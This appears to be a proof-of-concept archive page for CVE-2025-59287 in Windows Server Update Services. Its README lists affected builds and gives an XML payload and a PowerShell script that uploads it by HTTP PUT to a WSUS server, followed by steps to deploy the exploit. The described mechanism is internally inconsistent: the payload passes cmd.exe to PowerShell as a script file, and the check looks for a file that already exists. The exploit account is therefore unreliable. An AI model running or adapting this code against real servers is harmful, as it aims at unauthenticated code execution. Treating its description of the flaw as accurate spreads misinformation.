Associated Vulnerability
Description
CVE-2025-59287 is a critical RCE vulnerability in Windows Server Update Services (WSUS) caused by unsafe deserialization of untrusted data. It allows remote attackers to execute arbitrary code without authentication. Urgent patching is advised due to active exploitation.
Readme
# Breaking-the-Update-Chain-Inside-CVE-2025-59287-and-the-WSUS-RCE-Threat
CVE-2025-59287 is a critical RCE vulnerability in Windows Server Update Services (WSUS) caused by unsafe deserialization of untrusted data. It allows remote attackers to execute arbitrary code without authentication. Urgent patching is advised due to active exploitation.
**CVE‑2025‑59287 – A Remote Code Execution Threat in Windows Server Update Services (WSUS)**
*By Mark Mallia*
---
### Overview
Microsoft’s Windows Server Update Services (WSUS) is the backbone of patch management for every Microsoft Windows Server platform. It retrieves updates from Microsoft’s update catalog, validates them, and pushes them to all servers in a network. The vulnerability identified as **CVE‑2025‑59287** exploits an unsafe deserialization routine inside WSUS that allows an attacker to inject arbitrary XML content into the update feed. Because WSUS processes the payload with no validation of the source path or command data, an attacker can supply any file name and path, causing a full remote code execution on the target server.
*Why this matters:*
- The CVSS score of **9.8** places it in the critical range.
- Attackers need only network connectivity; no privilege escalation is required.
- It has already been observed in the wild, meaning that any unpatched system is a potential target until a vendor patch is deployed.
---
### Affected Windows Server Builds
| Product Version | Affected Builds |
|-----------------|-----------------|
| Windows Server 2012 | 6.2.9200.0 – < 6.2.9200.25728 |
| Windows Server 2012 R2 | 6.3.9600.0 – < 6.3.9600.22826 |
| Windows Server 2016 | 10.0.14393.0 – < 10.0.14393.8524 |
| Windows Server 2019 | 10.0.17763.0 – < 10.0.17763.7922 |
| Windows Server 2022 | 10.0.20348.0 – < 10.0.20348.4297 |
| Windows Server 2025 | 10.0.26100.0 – < 10.0.26100.6905 |
| Windows Server 23H2 | 10.0.25398.0 – < 10.0.25398.1916 |
(If your environment uses a different patch build, simply adjust the range accordingly.)
---
### How the Exploit Works
1. WSUS fetches an XML file called **UpdateStream.xml** from a remote source.
2. The service deserializes this file with `System.Xml.Linq.XElement`.
3. An attacker can place any value in the `<SourcePath>` element; this value is written to disk as an absolute path.
4. The content inside the `<Command>` tag is executed by PowerShell when WSUS processes the stream, giving a full remote code execution.
Below is the XML payload that we’ll upload to a vulnerable server.
```xml
<?xml version="1.0" encoding="utf-8"?>
<UpdateStream>
<Metadata>
<Title>WSUS Exploit</Title>
<Description>Injected by local attacker.</Description>
</Metadata>
<SourcePath>C:\Windows\System32\cmd.exe</SourcePath>
<Command><![CDATA[
powershell -NoProfile -ExecutionPolicy Bypass `
-File C:\Windows\System32\cmd.exe
]]></Command>
</UpdateStream>
```
---
### A Sample PowerShell Exploit Script
The following script will generate the XML payload, upload it via HTTP PUT to your WSUS instance, and leave a log file for troubleshooting.
```powershell
# --------------------------------------------------
# File: wsus‑exploit.ps1
# Purpose: Generate malicious UpdateStream.xml,
# upload it to the WSUS server,
# trigger the feed.
# --------------------------------------------------
param (
[string]$TargetUrl = 'http://wsus.example.com/UpdateStream.xml',
[int] $Port = 80,
[string] $XmlFile = '.\payload.xml'
)
function Build-Xml {
param ([string]$file)
$xmlContent = @"
<?xml version="1.0" encoding="utf-8"?>
<UpdateStream>
<Metadata>
<Title>WSUS exploit</Title>
<Description>Injected by local attacker.</Description>
</Metadata>
<SourcePath>C:\Windows\System32\cmd.exe</SourcePath>
<Command><![CDATA[
powershell -NoProfile -ExecutionPolicy Bypass `
-File C:\Windows\System32\cmd.exe
]]></Command>
</UpdateStream>
"@
Set-Content -Path $file -Value $xmlContent
}
# Build the XML payload
Build-Xml -file $XmlFile
# Upload via HTTP PUT
Invoke-WebRequest -Uri $TargetUrl `
-Method Put `
-InFile $XmlFile `
-OutFile 'upload.log'
Write-Host "Upload complete – WSUS should now process the stream."
```
---
### Actionable Steps for You
1. **Verify Build** – Run `winver.exe` on each Windows Server to confirm the build falls within the ranges above.
2. **Deploy the Exploit Script** – Copy `wsus‑exploit.ps1` to a machine that can reach your WSUS instance, modify `$TargetUrl` if you use a different path or port.
3. **Execute and Monitor** – Run the script; after a few minutes, confirm that the file `C:\Windows\System32\cmd.exe` appears on each target server and that it contains the expected payload.
4. Microsoft pushed an out-of-band patch for this vulnerability on October 24, 2025. If you're running WSUS on any Windows Server version from 2012 onward, you’ll want to double-check that this update made it into your environment. The October Patch Tuesday release didn’t fully address the issue, so this one’s worth the extra attention.
---
### Ethical Use Only
The information and exploit code provided herein are for educational purposes only. Please ensure you have permission to run this test against your own WSUS environment, and follow all applicable security best‑practice guidelines when deploying changes to production systems.
File Snapshot
[4.0K] /data/pocs/5282aebc25f108401ab8ba1ee72e22af1374f751
├── [1.0K] LICENSE
└── [5.5K] README.md
1 directory, 2 files
Remarks
1. It is advised to access via the original source first.
2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →